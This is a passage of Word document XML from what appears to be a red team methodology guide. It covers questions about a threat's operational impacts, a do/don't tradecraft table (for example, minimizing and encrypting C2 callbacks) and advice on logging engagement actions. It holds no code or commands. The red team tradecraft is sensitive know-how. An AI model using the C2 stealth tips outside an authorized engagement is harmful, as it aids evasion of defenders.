          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What must a threat do to stimulate a reaction from an organization?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78088A60" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>A THREAT’S ABILITY TO PERFORM OPERATIONAL IMPACTS</w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:anchor="a-threats-ability-to-perform-operational-impacts" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AB17677" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What impacts can a threat perform against an organization?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A9B29" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How can a threat affect X?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C1904" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00BB134D" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RED TEAM TRADECRAFT AND TTP GUIDANCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76EFD0" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GUIDANCE</w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:anchor="guidance" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3975"/>
        <w:gridCol w:w="5051"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE2659" w:rsidRPr="00FE2659" w14:paraId="405C05BB" w14:textId="77777777" w:rsidTr="00FE2659">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FDAFE04" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Do</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F4FB83E" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Don't</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE2659" w:rsidRPr="00FE2659" w14:paraId="6E0BFAC3" w14:textId="77777777" w:rsidTr="00FE2659">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25549D4B" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Log all significant events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A230F3A" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Use untested tools on a target system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE2659" w:rsidRPr="00FE2659" w14:paraId="034D10A4" w14:textId="77777777" w:rsidTr="00FE2659">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C9FEABF" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Consult with peers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DFD8E67" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Use unencrypted channels for C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE2659" w:rsidRPr="00FE2659" w14:paraId="6A7E884B" w14:textId="77777777" w:rsidTr="00FE2659">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E840393" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Understand tools and technology used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6989E762" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Attempt to exploit or attack unencrypted websites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE2659" w:rsidRPr="00FE2659" w14:paraId="64BFCF8A" w14:textId="77777777" w:rsidTr="00FE2659">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="133FA274" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Perform situational awareness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B4803A0" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Execute from non-executable locations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE2659" w:rsidRPr="00FE2659" w14:paraId="43F82036" w14:textId="77777777" w:rsidTr="00FE2659">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D89C6BD" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Minimize callback (C2) volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1999FFD4" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Download restricted datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE2659" w:rsidRPr="00FE2659" w14:paraId="6021F1D5" w14:textId="77777777" w:rsidTr="00FE2659">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F89A4D" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4437E9" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE2659">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Use binaries for initial access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="114772E4" w14:textId="41BC8664" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0F47A0" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DO</w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:anchor="do" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E3BCB2C" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>LOG ALL SIGNIFICANT ACTIONS (SUCCESSES AND FAILURES)</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:anchor="log-all-significant-actions-successes-and-failures" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66EE2F2C" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Log, log and log some more! Screenshot all significant actions including successful and failed attempts. One of the most important aspects of the Red Team engagement is the collection of data (a.k.a. logs). It is common that an inexperienced team completes an engagement with subpar documentation. Many actions are not fully captured, some actions are never captured, and often key failures are ignored. Each action performed provides value to the target as well as the target defenders. Incomplete logs prevent the Red Team from providing a complete and accurate depiction of the actions, obstacles, and defensive strengths and weaknesses of the target (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> mission failure). There are several methods to ensure logs are appropriately captured and stored:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94A32B" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Automated logging of the terminal: All terminal actions logged, timestamped and stored to a predefined location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13448FF3" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool logs: Most commercial tools have some capability to log actions and produce a raw and/or final report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48532343" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Custom tools logs: If you write a custom tool/script, it should output a log of actions and results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387C8DD8" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Operator logs: By far this is the most important log. A log may show the action performed and the result; however, only the operator can accurately note the way the action was performed, what lead them to the decision, and their interpretation of the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5A5C68" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Screenshots: Terminal logs are great for the operator and even better as supporting artifacts; however, they may mean nothing to senior level executives (and even some IT professionals). Screenshots before, during, and following the execution of an action hold much more weight than a terminal log, tool log, or operator log (often if may just be a screenshot of the terminal during execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E97B974" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CONSULT WITH PEERS</w:t>
